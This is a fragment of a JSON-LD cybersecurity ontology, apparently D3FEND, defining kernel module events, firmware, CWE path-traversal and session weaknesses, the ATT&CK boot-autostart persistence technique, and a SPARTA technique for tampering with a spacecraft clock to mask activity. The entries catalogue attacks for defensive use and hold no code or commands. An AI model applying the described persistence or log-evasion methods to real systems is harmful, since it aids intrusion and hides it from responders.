      "d3f:kb-reference-title": "Motion detector",
      "rdfs:label": "Reference - Wikipedia: Motion detector"
    },
    {
      "@id": "d3f:KernelModuleUnloadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the removal of a kernel module from the operating system kernel, deallocating resources and potentially altering system functionality.",
      "rdfs:label": "Kernel Module Unload Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelModuleEvent"
        },
        {
          "@id": "_:N2f49dec399b54513934873e14a132760"
        },
        {
          "@id": "_:N5056fab77dae4edf8c6ed0266f70ad04"
        }
      ]
    },
    {
      "@id": "_:N2f49dec399b54513934873e14a132760",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModuleLoadEvent"
      }
    },
    {
      "@id": "_:N5056fab77dae4edf8c6ed0266f70ad04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryDeletionEvent"
      }
    },
    {
      "@id": "d3f:Open-sourceDeveloper",
      "@type": "owl:Class",
      "d3f:definition": "An open-source developer contributes to the development, maintenance, or improvement of open-source projects.",
      "rdfs:label": "Open-source Developer",
      "rdfs:subClassOf": {
        "@id": "d3f:ProductDeveloper"
      }
    },
    {
      "@id": "d3f:T1547",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547",
      "d3f:definition": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.",
      "rdfs:label": "Boot or Logon Autostart Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:has-weakness",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-weakness y: The entity x exhibits a condition y that could, in some circumstances, lead to a vulnerability.",
      "owl:inverseOf": {
        "@id": "d3f:weakness-of"
      },
      "rdfs:label": "has-weakness",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-have-weakness"
      }
    },
    {
      "@id": "d3f:Grouping",
      "@type": "owl:Class",
      "rdfs:label": "Grouping",
      "rdfs:subClassOf": {
        "@id": "d3f:Summarizing"
      }
    },
    {
      "@id": "d3f:SystemFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on a computer's main board which manages the initial boot process. It can also continue to run or function after the operating system boots.",
      "rdfs:label": "System Firmware",
      "rdfs:subClassOf": {
        "@id": "d3f:Firmware"
      },
      "skos:altLabel": [
        "BIOS Firmware",
        "UEFI Firmware"
      ]
    },
    {
      "@id": "d3f:CWE-35",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-35",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '.../...//'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:Reference-RFC7642SystemForCrossDomainIdentityManagementDefinitionsOverviewConceptsAndRequirements",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc7642"
      },
      "d3f:kb-abstract": "The System for Cross-domain Identity Management (SCIM) specification is designed to manage user identity in cloud-based applications and services in a standardized way to enable interoperability, security, and scalability.  The specification suite seeks to build upon experience with existing schemas and deployments, placing specific emphasis on simplicity of development and integration, while applying existing authentication, authorization, and privacy models.  The intent of the SCIM specification is to reduce the cost and complexity of user management operations by providing a common user schema and extension model, as well as binding documents to provide patterns for exchanging this schema using standard protocols.  In essence, make it fast, cheap, and easy to move users in to, out of, and around the cloud.",
      "d3f:kb-author": "K. LI, B. Khasnabish, A. Nadalin, Z. Zeltsan",
      "d3f:kb-organization": "IETF",
      "d3f:kb-reference-of": {
        "@id": "d3f:AccessModeling"
      },
      "d3f:kb-reference-title": "RFC7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements",
      "rdfs:label": "Reference - RFC 7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements"
    },
    {
      "@id": "d3f:CWE-613",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-613",
      "d3f:definition": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\"",
      "rdfs:label": "Insufficient Session Expiration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-672"
      }
    },
    {
      "@id": "d3f:ComputerCabinet",
      "@type": "owl:Class",
      "d3f:definition": "A computer cabinet houses one or more computers and can range in size and material.",
      "rdfs:label": "Computer Cabinet",
      "rdfs:seeAlso": [
        "IEEE C37.20.2",
        "https://dbpedia.org/page/Computer_cabinet"
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:DE-0003.09",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.09",
      "d3f:definition": "The adversary biases the spacecraft’s authoritative time so that telemetry, event logs, and command histories appear shifted or inconsistent. By writing clock registers, altering disciplining sources (e.g., GNSS vs. free-running oscillator), or tweaking distribution services and offsets, they can make stored commands execute “earlier” or “later” on the timeline and misalign acknowledgments with actual actions. Downlinked frames still carry plausible timestamps near packet headers, but those stamps no longer reflect when data was produced, complicating reconstruction of sequences and masking causality during incident analysis.",
      "d3f:modifies": {
        "@id": "d3f:SystemTime"
      },
      "rdfs:label": "System Clock for Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/09/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N457bd2c179e94fd98b90e443888131b7"
        }
      ],
      "skos:prefLabel": "System Clock for Evasion"
    },
    {
      "@id": "_:N457bd2c179e94fd98b90e443888131b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTime"
      }
    },
    {
      "@id": "d3f:CCI-002282_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the association of organization-defined security attributes to organization-defined objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002282"
    },
    {
      "@id": "d3f:ATLASAIModelAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0000"
      },
      "rdfs:label": "AI Model Access Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N2c9ae2b039c341e2a7d91936acc987a4"
        }
      ],
      "skos:prefLabel": "AI Model Access Technique"
    },
    {
      "@id": "_:N2c9ae2b039c341e2a7d91936acc987a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0000"
      }
    },
    {
      "@id": "d3f:Link",
      "@type": "owl:Class",
      "d3f:definition": "A link is a connection or association between two entities that facilitates communication, interaction, or data transfer.",
      "rdfs:label": "Link",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Link"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDCore"
        },
        {
          "@id": "d3f:DigitalInformationBearer"
        }
      ]
    }
  ]
}